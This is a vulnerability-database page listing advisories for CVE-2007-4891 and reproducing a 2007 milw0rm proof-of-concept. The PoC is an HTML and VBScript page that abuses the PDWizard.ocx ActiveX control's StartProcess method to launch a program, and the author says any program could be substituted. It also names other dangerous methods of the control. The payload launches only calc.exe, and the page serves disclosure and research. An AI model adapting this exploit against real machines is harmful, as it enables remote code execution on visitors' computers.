| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Microsoft Visual Studio PDWizard.ocx ActiveX Control Code Execution (CVE-2007-4891) | 24 Oct 200700:00 | – | checkpoint_advisories | |
| CVE-2007-4891 | 14 Sep 200701:00 | – | cve | |
| CVE-2007-4891 | 14 Sep 200701:00 | – | cvelist | |
| DSquare Exploit Pack: D2SEC_PDWIZARD | 14 Sep 200701:17 | – | d2 | |
| CVE-2007-4891 | 14 Sep 200701:17 | – | nvd | |
| Code injection | 14 Sep 200701:17 | – | prion | |
| Microsoft Visual Studio PDWizard.ocx ActiveX vulnerability | 30 Sep 200700:00 | – | saint | |
| Microsoft Visual Studio PDWizard.ocx ActiveX vulnerability | 30 Sep 200700:00 | – | saint | |
| Microsoft Visual Studio PDWizard.ocx ActiveX vulnerability | 30 Sep 200700:00 | – | saint | |
| Microsoft Visual Studio PDWizard.ocx ActiveX vulnerability | 30 Sep 200700:00 | – | saint |
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------------------------
<b>Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution</b>
url: http://www.microsoft.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b><font color='red'>greetz to: Wiz001 (be safe brotha... and see soon :D)</font></b>
<b>Description:
This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
"StartProcess()" and "SyncShell()"
Using one of them, you'll be able to run every program you like, simply giving to the method the
right argument.
In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
you like.
Anyway, I think you could imagine what impact could have this kind of vulnerability :D
Other dangerous methods of this ocx are:
"SaveAs()"
"CABDefaultURL()"
"CABFileName()"
"CABRunFile()"</b>
------------------------------------------------------------------------------------------------------
<object classid='clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application ;)
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-09-11]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation